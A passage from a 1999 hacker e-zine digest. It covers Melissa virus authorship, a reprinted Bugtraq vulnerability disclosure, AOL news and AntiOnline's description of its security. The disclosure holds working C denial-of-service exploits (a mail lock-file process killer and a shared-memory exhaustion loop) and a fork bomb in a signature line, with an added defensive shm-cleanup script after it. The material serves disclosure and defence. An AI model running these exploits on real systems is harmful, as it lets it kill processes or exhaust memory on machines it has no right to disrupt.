       Shiver and Melissa share the same GUID. However, because virus developers
       frequently build on the work of others, in the same way that VicodinES built on
       Shiver to create PSD2000.DOC, VicodinES could have written Melissa, as well. 

       Other possibilities exist. Another virus developer could have built Melissa out of
       the core of Shiver, or another developer out of another virus created on the same
       machine as the core of Shiver. 

       Finally, someone could have taken the PSD2000.DOC file and enhanced it into
       Melissa. Because VicodinES appears to be the first person to have created a Word
       2000 macro virus, it could be that the virus creator built Melissa out of Vicodin's
        PSD2000.DOC virus. Who is ALT-F11? Our information is spotty, but ALT-F11 is a part
       of the self-styled "Alternative Virus Mafia." 
       
        AVM Website: http://www.codebreakers.org/avm/index.html
       
       @HWA
        
 19.0  Various vulnerabilities (mostly Linux);
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
        X-Persona: <hwa@press.usmc.net> 
       Return-Path: <owner-bugtraq@netspace.org> 
       X-Hate: Where do you want to go to die? 
       Message-ID: <Pine.LNX.4.05.9903070059130.710-100000@nimue.ids.pl> 
       Date:   Sun, 7 Mar 1999 01:41:25 +0100 
       Reply-To: Michal Zalewski <lcamtuf@IDS.PL> 
       Sender: Bugtraq List <BUGTRAQ@netspace.org> 
       From: Michal Zalewski <lcamtuf@IDS.PL> 
       Subject:      ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Commander 
                     (x2) 
       To: BUGTRAQ@netspace.org 
       
       
        ** Summary of reported vulnerabilities **
       
       
       1. Overflow in CAC.Washington.EDU ipop3d 4.xx
       2. Overflow in pine 4.xx (Linux)
        3. Lockfile vulnerability in pine 4.xx (Linux)
        4. Lockfile vulnerability in ipop3d 4.xx
        5. Linux 2.x IPC vulnerability
        6. Linux 2.x mmap vulnerability
       7. Midnight Commander 4.x bugs (x2)
       
       
       ** DETAILS **
       
       
       
       1. Overflow in CAC.Washington.EDU ipop3d 4.xx
       2. Overflow in pine 4.xx (Linux)
       
       
        Both programs, at least on the Linux platform, have a serious security hole.
        When data is read from the so-called mailbox lock created in the /tmp directory
        (this happens under certain conditions - please refer to the exploit code below),
        it's stored in a _too_small_ buffer. It is possible to overwrite some data,
        and registers as well. For testing purposes, the simple exploit code presented
        below (vulnerabilities 3 and 4) could be used - suggested changes:
       
       
       write(i,"-1",2)   ->   write(i,"(about 1100 b)",1100)
       truncate(i,2)     ->   truncate(i,1100);
       
       
        Overflow in pine might be used to gain other lusers' privileges (or,
        sometimes, root privileges, depending on his stupidity ;-).
       
       
       Exploited overflow in ipop3d could be used to gain superuser access (the
       only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
       
       
       CAC.Washington.EDU ipop3d is shipped by default with Red Hat Linux,
       included in IMAP package.
       
       
       Solution: in both cases, you have to look for something like
       kill(i,SIGUSR2) in sources and modify lines just before it ;>
       
       
       -
       
       
        3. Lockfile vulnerability in pine 4.xx (Linux)
        4. Lockfile vulnerability in ipop3d 4.xx
       
       
        The problem is probably well known, but silently ignored by pine vendors.
        Unfortunately, it's possible to turn this 'mostly harmless feature' into
        something nasty - the following code allows various DoSes by killing all
        processes of a luser (could be root?) every time he/she runs pine or
        receives mail via the POP3 protocol:
       
       
        -- lock-exploit.c --
        // Pine 4.xx, ipop3d 4.xx and other /tmp-lock based mail stuff.
        // Creates the world-writable /tmp lock for the given user's mailbox and
        // keeps the pid "-1" in it, the value the mailer later passes to kill().
        
        
        #include <stdio.h>      /* printf, snprintf */
        #include <stdlib.h>     /* exit */
        #include <fcntl.h>      /* open, O_RDWR, O_CREAT */
        #include <sys/file.h>   /* flock, LOCK_EX */
        #include <sys/stat.h>   /* stat, fchmod */
        #include <unistd.h>     /* lseek, write, ftruncate, fsync, sleep */
        
        
        int main(int argc,char* argv[]) {
          int i,a=0;
          char s[100];
          struct stat x;
          if (argc<2) exit(printf("Usage: %s account_name\n",argv[0]));
          snprintf(s,sizeof s,"/var/spool/mail/%s",argv[1]);
          if (stat(s,&x)) exit(printf("Mailbox (%s) not found.\n",s));
          /* the lock name is derived from the mailbox's device and inode numbers */
          snprintf(s,sizeof s,"/tmp/.%x.%x",(int)x.st_dev,(int)x.st_ino);
          fchmod(i=open(s,O_RDWR|O_CREAT,0600),0666);
          while (1) {
            lseek(i,0,0);
            write(i,"-1",2);
            ftruncate(i,2);
            fsync(i);
            if (!a++) {
              if (!flock(i,LOCK_EX)) printf("Got lock on %s.\n",s);
              else printf("File %s already locked, wait...\n",s);
            }
            sleep(1);
          }
          return 0;
        }
        -- eof --
       
       
       Works well under Linux. Under BSD, pine seems to have broken mailbox
       access negotiation (fortunately ;-). No information about ipop3d.
       
       
        Mainly, this vulnerability demonstrates that world-writable mailbox locks
        in /tmp are a SICK IDEA (one day, as I recall, one of the pine vendors said it's
        'harmless', while other solutions allow several DoS attacks... huh).
       
       
       -
       
       
        5. Linux 2.x IPC vulnerability
       
       
        The Linux IPC implementation seems to be broken. I noticed Alan about one/two
        months ago, so I believe it has been fixed in recent 2.2.x Linuxes. In
        fact, any luser may consume all memory available on the system using this
        simple program:
       
       
        -- shmkill.c --
        /* Allocates System V shared memory segments in a loop and touches every
         * byte so the pages are really committed; when an allocation fails the
         * requested size is divided by ten. Segments outlive the process. */
        #include <errno.h>
        #include <sys/ipc.h>
        #include <sys/shm.h>
        
        
        int i, d = 1;
        char *x;
        
        
        int main(void) {
          while (1) {
            x = shmat(shmget(IPC_PRIVATE, 10000000 / d, 0777), 0, 0);
            if (errno) { d *= 10; continue; }
            for (i = 0; i < 10000000 / d; i++)
              if (*(x + i)) ;
          }
        }
        -- eof --
       
       
        Memory won't be freed even if the luser's process is killed; you have to
        use ipcrm, but there could be not enough memory left to run anything :-(
       
       
        Under early 2.2.x, you have to run this program several times to ensure
        pages are detached (in this state, they are ownerless ;-).
       
       
        The simplest solution is to restrict IPC for lusers entirely. Only a few
        programs use IPC - probably only dosemu and ShoutCast ;>
       
       
       -
       
       
        6. Linux 2.x mmap vulnerability
       
       
        Linux 2.0.36 has a similar problem with copy-on-write pages allocated
        with mmap - these pages are not accounted within per-user limits.
        Fortunately, it's less harmful than (5), because memory will be freed as
        soon as the process owning it is killed. An exploit will NOT be posted - see
        above.
       
       
       -
       
       
       7. Midnight Commander 4.x bugs (x2)
       
       
        Still not fixed. Temporary files of mc are created in an insecure way, allowing
        typical races. Also, entering directories containing $(...) somewhere in
        their name might result in execution of the embedded code. Described days ago,
        dunno why it hasn't been patched.
       
       
       _______________________________________________________________________
       Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM]
       [Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
       [voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
       Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
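
       The post's practical consequence for an admin is that detached shm
       segments survive the process that created them and have to be found and
       removed by hand with ipcrm. The following is an added example, not code
       from the post above: it parses the table Linux exposes in
       /proc/sysvipc/shm (the same data `ipcs -m` prints) and lists segments
       with no attached process, grouped by owner uid. The sample table, the
       uids and sizes in it, and the 14-column layout it assumes are all
       constructed for this example.

```python
"""Report System V shared-memory segments that outlive their creator.

Added example (not part of the post above). Reads the text of
/proc/sysvipc/shm and reports segments with no attached process, grouped by
owner uid. SAMPLE_SHM is constructed for this example; on a live system pass
open("/proc/sysvipc/shm").read() instead.
"""
from collections import defaultdict

# Assumption: the first 14 columns of /proc/sysvipc/shm, in this order.
# Later kernels append rss and swap columns, which are ignored here.
COLUMNS = ("key", "shmid", "perms", "size", "cpid", "lpid", "nattch",
           "uid", "gid", "cuid", "cgid", "atime", "dtime", "ctime")

# Constructed sample: uid 1001 left two detached 10 MB segments behind (the
# pattern a looping shmget/shmat program produces), uid 1002 left one, and
# root has a live segment with two processes attached.
SAMPLE_SHM = """\
       key      shmid perms       size  cpid  lpid nattch   uid   gid  cuid  cgid      atime      dtime      ctime
         0          0   777   10000000  1234     0      0  1001  1001  1001  1001  922850000  922850001  922850000
         0          1   777   10000000  1235     0      0  1001  1001  1001  1001  922850010  922850011  922850010
      4660          2   644     262144   400   401      2     0     0     0     0  922850020          0  922850020
         0          3   777    1000000  1240     0      0  1002  1002  1002  1002  922850030  922850031  922850030
"""


def parse_shm_table(text):
    """Turn the /proc/sysvipc/shm text into a list of dicts of ints."""
    segments = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < len(COLUMNS) or not fields[0].lstrip("-").isdigit():
            continue  # header line (or anything that is not a data row)
        values = [int(f) for f in fields[:len(COLUMNS)]]
        segments.append(dict(zip(COLUMNS, values)))
    return segments


def detached_segments(segments):
    """Segments no process is attached to: these survive their creator."""
    return [s for s in segments if s["nattch"] == 0]


def detached_bytes_by_uid(segments):
    """Bytes held in detached segments, per owning uid (who to talk to)."""
    totals = defaultdict(int)
    for s in detached_segments(segments):
        totals[s["uid"]] += s["size"]
    return dict(totals)


def ipcrm_commands(segments):
    """Cleanup commands for an operator to review; nothing is executed here."""
    return ["ipcrm -m %d" % s["shmid"] for s in detached_segments(segments)]


if __name__ == "__main__":
    segs = parse_shm_table(SAMPLE_SHM)
    for uid, total in sorted(detached_bytes_by_uid(segs).items()):
        print("uid %d holds %d bytes in detached segments" % (uid, total))
    print("\n".join(ipcrm_commands(segs)))
```

       A segment with nattch == 0 is not always garbage: a process may have
       created it and not attached yet, so check dtime/ctime against the
       current time before removing anything. Note also that a per-segment cap
       (kernel.shmmax) does not help against a program that simply allocates
       many segments in a loop; the post's own advice, restricting IPC for
       untrusted users, is what actually closes the hole.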

       
       @HWA 
       
       
 20.0  News from AOLWATCH
       ~~~~~~~~~~~~~~~~~~
       
       Date: Fri, 2 Apr 1999 15:36:20 -0800 (PST) 
       From: David Cassel <destiny@wco.com> 
       To: AOL Watch <aolwatch@aolwatch.org> 
       Subject: AOL Watch:  Hackers, Netscape, Death of AOL? 
       Sender: owner-aolwatch@cloud9.net 
       Precedence: bulk 
       X-List-Server: Cloud 9 Consulting, Inc.  http://www.cloud9.net 
       
       
       
       
       
            H a c k e r s,   N e t s c a p e,   D e a t h   o f   A O L ?
       
       
       ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~ 
       
       
       AOL finalized their acquisition of the browser company Netscape. And many
       Netscape employees scrambled for the door.  "So many good people have left
       by this point anyway," one Netscape staffer writes on their web page.  
       "People who were with Netscape for 3 or 4 years..."
       
       
           http://www.tarin.com/aowhat/aodiary.html
       
       
       Did AOL's unpopularity precede them? "Three other people I know are
       leaving within the month, regardless," the page continues.  "I don't think
       any of them have jobs lined up or are even very interested in looking.  
       Joe left last week without even waiting the week it would take him to get
       the bonus check."
       
       
       Steve Case had offered each of Netscape's 2300 employees an extra month's
       pay to stay until the takeover was complete, according to Wired News.
       ("AOL's mainstream corporate bent has long made it akin to the antichrist
       in the eyes of early Net users," the article notes, "scores of whom came
       to work at Netscape in its youth.")
       
       
           http://www.wired.com/news/news/business/story/16564.html
       
       
       But though the disgruntled Netscape staffer remained, they created an
       on-line diary -- "Doom@Netscape.com" -- chronicling low morale after AOL's
       takeover.  ( http://www.tarin.com/aowhat/aodiary.html ) Their site also
       offered a series of answers to frequently-asked questions, titled "How
       does it feel to wake up as an AOL employee?"
       
       
       "It sucks, duh."
       
       
           http://www.tarin.com/aowhat/aofaq.html
       
       
       "I've been proud to work for Netscape, and I will never be proud to work
       for AOL."
       
       
       They linked that response to the "Why AOL Sucks" site. 
       ( http://www.aolsucks.org )
       
       
       Harsher criticism came yesterday from Netscape's Jamie Zawinski.  "This
       buyout meant that Netscape's executives had finally given up."
       
       
           http://www.jwz.org/gruntle/aol.html
       
       
       In an on-line essay explaining his resignation from a high-profile project
       overseeing code for the Mozilla browser, Zawinski too felt compelled to
       link to the "Why AOL Sucks" page.
       
       
           http://www.jwz.org/gruntle/aol.html
           http://www.aolsucks.org/censor/
       
       
       Elsewhere, he articulated his philosophical objections to AOL.  "AOL is
       about centralization and control of content.  Everything that is good
       about the Internet, everything that differentiates it from television, is
       about empowerment of the individual.
       
       
       I don't want to be a part of an effort that could result in the
       elimination of all that."
       
       
           http://www.jwz.org/gruntle/nomo.html
       
       
       Some have resigned themselves to the inevitable.  At one recent function
       at Netscape, visitors made dark jokes about not spilling drinks on AOL's
       carpet.  But at least one Netscape employee captured their feelings with
       an e-mail tag-line re-writing South Park's familiar refrain.
       
       
       "Oh my God! They killed Netscape!"
       
       
       There was just one question remaining when Steve Case made an appearance
       at Netscape.  "After the deal closes, will you stop sending me disks?"
       
       
       Steve Case answered evasively.  "Well, the thing is, I'm sure you have
       neighbors, or friends, or family, who don't yet know about the power of
       the Internet, and I think you'll want to share--"
       
       
       "I think," Netscape's Jim Barksdale cut in, "his answer is no."
       
       
           http://www.tarin.com/aowhat/caseinterview.html
       
       
       AOL began their reign by laying off hundreds of workers -- a whopping 425
       Netscape employees.  ( "You've Got Pink Slips," read one headline. )
       
       
           http://fnews.yahoo.com/street/99/03/25/valley_990325.html 
       
       
       But there may be more bad publicity ahead...
       
       
       The Department of Labor has launched an inquiry into AOL's employment
       practices, AOL Watch has learned.  Additional information came from an AOL
       watchdog web page, which suggests the issue is the lack of wages paid to
       on-line staffers.  Is AOL employing a force of strictly-controlled
       volunteers, using AOL tools to perform the same integral work as paid
       employees?
       
       
           http://www.observers.net/dol.html
       
       
       The page includes contact information for a Department of Labor officer --
       and even a case number.  Reached for comment, a Department of Labor
       officer added only "If we have an open investigation, I am not allowed to
       talk to the reporters."  But they acknowledged an awareness of the page's
       existence.
       
       
       But AOL's contact with the federal government doesn't end there. "AOL is
       flexing its muscle in the political world," one MSNBC article noted in
       November -- citing an "ambitious lobbying campaign" which is just "one
       piece of a multi-pronged effort by AOL to increase its influence on the
       government's decision-making process."
       
       
         http://www.zdnet.com/zdnn/stories/news/0,4586,2167455,00.html
       
       
       AOL appears concerned they'll be replaced by high-speed cable internet
       access -- and they've been aggressively lobbying with other companies for
       a place in cable offerings.  In February, however, C|Net reported that
       "Internet service providers were dealt a blow...when the FCC decided to
       postpone any decision on whether ISPs had the right to lease access on
       cable companies' pipes..."
       
       
           http://www.news.com/News/Item/0,4,31930,00.html
       
       
       Meanwhile, AOL's position drew sharp ridicule from the "Frontiers of
       Freedom"  -- a non-profit organization founded by former U.S. Senator
       Malcolm Wallop.  "AOL is now calling for the heavy hand of government to
       stifle competitors and to regulate access to the internet," the group's
       web site complains.  "[H]aving made a bad business decision to sell its
       own network, AOL has no business inviting government to hamstring
       competitors -- who have developed a superior product that's 50 to 100
       times faster than AOL's -- by regulating them."
       
       
           http://www.ffreports.org/
       
       
       The criticisms are withering.  "While they fight Internet censorship (even
       going to bat for the free speech rights of a pro-Klan group), they were
       less tolerant of a website entitled, www.aolsucks.com," the organization
       notes.  "That one hit too too close for comfort..."  the page continues --
       apparently referring to the incident detailed at
       http://www.aolsucks.org/webcens/
       
       
       But more withering comments were submitted by readers.  
       
       
       
           "Come on AOL, stop wasting money on government lobbyists and put your
            money into building a better product."
       
       
       
           "If this is the way we want to do things in this country, then I'm
            going to start a whale oil lamp company and sue the local electricity
            companies for putting me out of business; it makes as much sense."
       
       
       
            "The pure unmitigated gall of Steve Case is unbelievable."
       
       
       
           http://216.46.238.18/ubb/Forum2/HTML/000001.html
           http://216.46.238.18/ubb/Forum1/HTML/000002.html
       
       
       
       The site may be bad news for AOL.  It offers visitors the ability to
       easily contact relevant FCC and Congressional officials on-line.  ("We'll
       make sure your e-mail is delivered, and your strong beliefs are heard.")
       
       
           http://ffreports.org/help/index.html
       
       
       AOL has made light of their own drive for dominance.  "We think it would
       be good if the IRS would, on your tax form, just have a checkoff box, 'Do
       you currently subscribe to AOL,'" Steve Case joked at the National Press
       Club in March of 1996, "and if you don't, we'll send you the disk and we
       can eliminate a lot of duplication and waste."
       
       
       But the reality is less jovial.  AOL recently filed legal attacks against
       AT&T's "WorldNet" service -- for using the phrase "You have mail."  AOL's
       request to block use of that phrase -- along with the phrases "Buddy List"
       and "Instant Message" -- was rejected by a Federal District Court Judge in
       early January.  "The AOL lawsuit provides a glimpse into a Web future
       where lawyers chase ambulances in cyberspace," observed Roger Ebert this
       month in his Yahoo! Internet Life column.
       
       
       AOL's behavior suggests a philosophical danger.  "We're pleased that Judge
       Hilton has rejected this attempt by AOL to appropriate common Internet
       terms for its own exclusive use," AT&T's counsel announced in a
       statement.  But he added that "we feel this sort of overreaching by one
       company raises serious concerns about whether AOL is truly committed to
       keeping the Internet an open platform, or whether it intends to leverage
       its dominance to make the Net more proprietary."
       
       
           http://www.att.com/press/item/0,1193,262,00.html
           http://www.news.com/News/Item/0,4,30479,00.html
       
       
       Strangely, the Wall Street Journal had reported last Friday that AOL was
       "winning respect across Silicon Valley." But that same day, the Associated
       Press reported a high school drop-out broke into AOL's mainframe.
       
       
           http://www.usatoday.com/life/cyber/tech/cte673.htm
       
       
       And hours later, an AOL account was fingered as the original distributor
       of the Melissa virus.  Described as "the most widespread computer virus
       ever seen," both Reuters and the Associated Press published the AOL
       screen name to which it was eventually linked.  The account's member
       profile connected the name to a 37-year-old civil engineer in Lynnwood,
       Washington -- who says the virus-distributor had stolen access to his
       account. "I am a little jarred about the lack of security that AOL has in
       place," the engineer told C|Net, "and am now going to close my AOL
       account."
       
       
           http://www.news.com/News/Item/0,4,34435,00.html
           http://www.abcnews.go.com/sections/tech/DailyNews/virus990330.html
       
       
       Ironically, pulling up his account's profile Tuesday displayed an AOL
       banner ad advising, "Send your love on-line."
       
       
       Today the Associated Press reported the virus's originator was " snared
       with the help of technicians at America Online, and a computer task force
       of federal and state agents."
       
       
          http://cbs.marketwatch.com/archive/19990402/news/current/melissa.htx
       
       
       "This is why my aunt can't get through to AOL's tech support," one user
       joked on an on-line bulletin board.  "They're all busy chasing virus
       writers! :) " 
       
       
       http://slashdot.org/comments.pl?sid=99/04/02/1542253&threshold=-1&commentsort=0&mode=thread&cid=2076
       
       
       It's not the first AOL-related incident.  VicodinES, whose work may have
       assisted the virus's true creator, brags about creating an earlier virus
       disguised as an AOL anti-crash patch, according to Ziff-Davis News.  And
       AOL "Trojan Horses" are nothing new.  MSNBC reported on the picture.exe
       password-stealer in January.
       
       
           http://www.zdnet.com/zdnn/stories/news/0,4586,2235046,00.html
           http://www.msnbc.com/news/229572.asp
       
       
       But security problems ultimately affect AOL's business operations. In
       October, the Associated Press reported that a 21-year-old hacked into
       AOL's call-center server in Ogden to send a threatening instant message.
       ("We are sick of your censorship and bad service," it began...)
           http://www.desnews.com/cgi-bin/libstory_reg?dn98&9810180329
       
       
       AOL has actually drawn continuing criticism for their technical
       shortcomings.  Wired News reported AOL only began testing their components
       for year-2000 glitches in January.  While that may have been soon enough,
       a "Y2K" consultant warned the news outlet that "if it turns out they do
       have compliance problems, there's no time left at this point."
       
       
           http://www.wired.com/news/news/business/story/17911.html
       
       
       In fact, outages are one of AOL's ongoing expectations.  "I would like to
       be able to tell you that this sort of thing will never happen again,"
       Steve Case commented in 1996 after a 19-hour nationwide outage, "but
       frankly, I can't make that commitment."
       
       
       Ultimately the latest problems may represent business as usual in AOL's
       hacker-friendly environment.  In 1995 hackers stole Steve Case's e-mail.  
       In 1996 the Washington Post reported AOL cancelled 370,000 accounts in one
       three-month period for "credit card fraud, hacking, etc." (9/16/96.)  And
       by 1998, hackers had hit at least 34 AOL areas -- including the highlights
       for Steve Case's monthly update.  (Its title bar changed to "Hey there
       sexy.")
       
       
       http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1995/09/07/MN16190.DTL
       http://www.aolwatch.org/acluhack.htm
       http://www.aolwatch.org/hacks.htm
       
       
       AOL's hacker community may even have its roots in AOL's history.  Until
       September of 1995, AOL didn't confirm the authenticity of credit card
       information submitted for free-trial accounts.  The 370,000 cancelled
       accounts the next Spring may indicate how entrenched the hacker population
       had become.
       
       
       But when AOL's on-line staff questioned lax policies, AOL Vice President
       Kathy Ryan showed indifference.  One on-line gathering was told, "we
       understand that our aggressive distribution of both software and
       certificates can result in 'throwaway' accounts.  We have made the
       business decision that the benefits in this case outweigh the
       disadvantages..."
       
       
       In those crucial early months, AOL remained silent on the dangers of
       "password-thieves."  (Password-fishing con artists who turned access to
       one AOL account into unauthorized access to several others.)  Terms of
       Service staffer Chip Douglas ultimately explained AOL's dilemma --
       marketing over security -- to another on-line gathering.  "Many times we
       (AOL) are caught between a rock and a hard place debating over the
       importance of our 'community' while still trying to be as open to new
       members as possible, and NOT scare them away with needless (?)  warnings
       about PW scammers, etc."
       
       
       Later that year, Steve Case made his first public acknowledgment of the
       problem -- and Netscape's Security Documentation Manager forwarded the
       entire letter to the Cypherpunks mailing list.  "Looks like AOL is being
       dragged, kicking and screaming, into the world of security," he crowed.
       
       
       But now Netscape is being dragged into the world of AOL.
       
       
       The "Doom@Netscape" site answers the question "What are you going to do
       now?"  by saying "Wait and see what happens.  What else can I do?"
       
       
       That employee got an answer Wednesday.  They were laid off.
       
       
       
       THE LAST LAUGH
       
       
       Staffers at Netscape's "NetCenter" may have gotten the last laugh. Last
       week their site offered two news headlines -- one announcing "AOL Cuts
       Jobs at Netscape."
       
       
       The second may have voiced related concerns.  "Working for an idiot?" it
       read.  "Do something about it!"
       
       
         David Cassel
         More Information - 
       
       
            http://www.sjmercury.com/columnists/cassidy/docs/mc112598.htm
            http://www.aolsucks.org/list/0050.html
            http://www.nytimes.com/library/tech/99/01/biztech/articles/31aol.html
            http://www.angelfire.com/co/atomikspage/letter.html
       
       
       ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~
       
       
           Please forward with subscription information.   To subscribe to this
           list, type your correct e-mail address in the form at the bottom
           of the page at http://www.aolsucks.org -- or send e-mail to
           MAJORDOMO@AOLWATCH.ORG containing the phrase SUBSCRIBE AOLWATCH 
       
       
       ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~
       

       @HWA
       
  21.0 AntiOnline. hack attempts and intelligence gathering.
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              
           
       Date: Thu, 25 Mar 1999 19:31:45 -0700 (MST) 
       From: mea culpa <jericho@dimensional.com> 
       To: DC-Stuff <dc-stuff@merde.dis.org> 
       Subject: Antionline Security & Hacker Intelligence 
       Message-ID: <Pine.SUN.3.96.990325192040.28084p-100000@flatland.dimensional.com> 
       Sender: owner-dc-stuff@dis.org 
              
       
       http://www.AntiOnline.com/SpecialReports/antionline-security/
       
       
       [Anti-online has published some details about how they stay so secure from
       those attacks launched from "175 unique hosts a day". Curious tho..]
       
       
       http://www.AntiOnline.com/SpecialReports/antionline-security/router.html
       
       
       We use both static and recursive access lists, as well as TCP Intercept
       (I'll go more in depth about those below). The router can only be accessed
       via console (almost totally eliminates the fear of someone breaking into
       the router, which would be a bad thing.) 
       
       
       http://www.AntiOnline.com/SpecialReports/antionline-security/omg.html
       
       
       If the "user" has done several hack attempts against us, the system may
       escalate the attempt, and actually set up a deny statement in our router,
       which stops the host from even passing data into our lan. 
       
       
       [So how does their program update the router if there is console only
       access?]
       
       
       
       http://www.AntiOnline.com/SpecialReports/antionline-security/info-gathering.html
       
       
       Not only do we try to keep up with the latest exploits and
       vulnerabilities, we also try to keep up with the latest THREATS.  Exploits
       are no danger to a system at all, if there's no one trying to use them
       against you. But, as with many networks, there never seems to be a limited
       supply of people willing to use those exploits against us. So, one of the
       things that we do (and dedicate a lot of resources to), is gathering
       intelligence.
       
       
       What are the active hack groups? Who's in those groups? What groups were
       those people in before this one? What exploits were used? What are their
       motives? What are they saying to other hack groups? What sites have they
       hit? What domains do they have access to? So on and so on. 
       
       
       [So JP/AO are now gathering profiles on active hacking groups. Seems these
       groups that talk to him for his stories should be careful what they say.]

       -=-
       
      From AntiOnline  
       
      Greetings All:
       
      I was planning on writing this up in a formal, stuffed shirt, journalistic mode,
      but soon decided that wasn't me, and that I'd be able to explain it better in my "MailBag"
      style of writing. So, I've warned you. Continue reading at your own risk, heh.....
       
      I get dozens of e-mails a day asking me different questions about our own security. What 
      products do we use, what policies do we have, how do we monitor, administer, firewall, and
      so on? Well, here it is. I'm going to go through our current security infrastructure step
      by step. I'll give you everything from descriptions of proprietary in-house software that
      we use, to our Cisco router configuration files. I've always said (as have many, many 
      others for that matter), that there is no such thing as "security through obscurity", so 
      I'm going to practice what I preach. I don't want the "average users" that read our site 
      to get intimidated at this point. I'm going to go through everything step by step, provide
      links where you can learn more about any subject which becomes "technical", and will use 
      common English (which I use anyway. I hate reading books written by college professors which 
      put forth a larger effort convincing the reader they know every technical bit of jargon under
      the sun, than they do actually explaining their subject matter). Also, I hope to dispel the 
      common myth that securing a network has to be an expensive endeavor. We are not a big
      budget operation by any extent of the imagination, and you don't have to be one either.

     So without further delay, here it is. The AntiOnline Information Security Systems and Policies.

     Yours In CyberSpace,
     John Vranesevich
     Founder, AntiOnline


     1 Environmental Security (I'm not talking about our operating systems.) 
     2 Garbage In, Garbage Out (How secure is our uplink?) 
     3 Ground Zero (Using Our Router As A First Line Of Defense) 
     4 There's No Place Like Home (Our desktops, or a battle ground?) 
     5 Watching Our Network (Highways have patrolmen and so does AntiOnline's network.) 
     6 OH MY GOD IT'S A HACKER!!! (Calling their ISP doesn't cut it, we have to stand up for ourselves!) 
     7 Neighborhood Watch (The woman across the street with a pair of binoculars, or BugTraq?) 
     8 Great, We're Finally Secure (No we're not.) 
     
     Environmental Security (I'm not talking about our operating systems.)

       Let's start at ground zero. Our offices. Having advanced digital security in 
       place does us no good if our physical and environmental security is lacking. 
       While this is probably not the most exciting or technical issue that I'll be 
       covering, I felt it important to include in the overview of our system.
       
       Physical Security:
       
       We use a wireless security system by Linear. There are a couple of good things 
       which attracted us to this system. First, it's all battery operated, with the 
       exception of the base unit. The base unit does, however, have a battery back-up
       in case of a power outage. We use standard door and window sensors, as well as 
       motion and heat change detectors, smoke alarms, and carbon dioxide detectors.
       If a sensor is triggered, it sends an alert signal to our base unit, which sets
       off a loud audible alarm, as  well as contacting our monitoring service. The 
       sensors also send an "on-line signal" once every minute to the base unit. If
       the base unit fails to receive a signal from one of these devices, the alarm
       is sounded as well (this protects against signal jammers and the like). There
       are only a few vulnerabilities that I could predict for this system. The main
       one would be someone cutting the phone lines where they enter the building. 
       Although we'd still get an audible alarm, the monitoring station wouldn't be
       contacted, unless by us directly using a cellular phone, or by a neighboring
       business hearing the alarm and alerting the police, which patrol this area on
       a regular basis anyway (We found out that the police have a very good response 
       time to our location. We had to call them once to report a "suspicious vehicle" 
       that was sitting in our parking lot at night for some time with all of its 
       lights off. It turned out that the vehicle contained little more than a couple 
       of teenagers that decided to use our parking lot as a convenient place to test 
       out their vehicle's shocks, if you know what I mean.) Our system also includes 
       a closed circuit television system, which sends footage via video cables to a 
       monitoring station and vcr in my apartment. Outdoor lighting is on at all times
       after dark, and battery operated exit lighting is activated during power
       outages. Every floor also has a fire extinguisher mounted in a convenient place.
       
       The major vulnerability that we currently have as far as physical security goes 
       would be from herf or tempest related attacks. With a herf attack, we would only
       have to worry about the loss of data, and not the compromise of it (we do include
       current copies of nearly everything off site). Due to our location, a tempest 
       attack would be very difficult, and incomprehensibly unlikely. If some agency is
       sitting in a van outside of our office and is monitoring us via tempest, we have 
       a lot more problems to worry about than our data being compromised. 
       
       Environmental Security:
       
       Our office has both central heat and air, and we try to maintain a constant indoor
       temperature of 70 degrees. Each room has a Kenmore Hepa-Filter and Air Ionizer to
       help maintain a dust free atmosphere. We use "Office Care" anti-dust and static 
       wipes on all monitors, and lightly mist the office carpeted floor with a mixture of
       liquid fabric softener and water once a week (That is a GREAT tip to ensure a static
       free environment that I picked up from the 1996 International Super Computing
       Convention).
       
       We also shred EVERY scrap of paper that leaves the office with an "Office Companion"
       paper shredder, making sure that we stir it all up before throwing it away
       (Yes, we actually do this; scary, isn't it?). This helps to stop any dumpster divers
       from getting any trade secrets, or other goodies from our garbage.
       
       Every window has a mini-blind on it, which would make it difficult to look over our 
       shoulders from 100 feet away with binoculars. We usually have loud music playing
       which would make it very unpleasant to try and spy in on us with a laser listening 
       device pointed at a window (haha).
       
       All computers in our offices are on battery back up systems. We have a calibrated 
       up-time of a little under 3 hours without electricity on all servers and network
       equipment. We have both rack mount and floor model APC Smart-UPS systems. One of
       our network monitoring stations alerts us in the event of a power outage, and
       all servers get safely shut down when the batteries reach a critically low level
       (this is all done through the Smart-UPS software).
                                                                                    
       Garbage In, Garbage Out (How secure is our uplink?):
       
       It's an expression that my high school chemistry teacher used to use when working
       with complex formulas, but I've found it to apply to information security (and many
       other things) as well. Having a very secure lan does little good if there's someone
       sitting on our upstream provider sniffing every un-encrypted packet that comes into
       us or leaves from us.
       
       We go through a company called "StarGate". They're the largest ISP in the Pittsburgh 
       area, with over 20,000 customers, 1,500 of which are corporate. Now, there is one
       bad thing to assume here. "Oh, it's a huge ISP, they must really know what they're 
       doing, and be very secure". Well, don't count on it.
       
       Our first step was to compile a list of a half dozen different ISPs. We chose these 
       based on the speed of the backbone that they have, available services that they
       offered, the size of their staff, the types of technology that they implemented, and
       of course, cost. We found that Stargate had a redundant dual T3 connection to the
       backbone, a staff of over 60, and although their fees were a little more than some of
       their competitors, we felt that they were probably the best over-all ISP for us. We
       called and talked to both corporate account agents, and engineers, to get a feel for
       the staff and the technology that they use. We did several trace routes from various
       machines through their network, to get an idea of how traffic was routed, and even 
       checked for any obvious security holes.
       
       As standard procedure, StarGate usually monitors traffic to their customer's networks
       so that they can be alerted automatically if the circuit goes down, and so they can
       keep bandwidth usage reports. They also are accustomed to providing both DNS and Email
       services for nearly every one of their customers. We decided, to help ensure the 
       integrity of our data, that we would disable their ability to monitor our traffic and
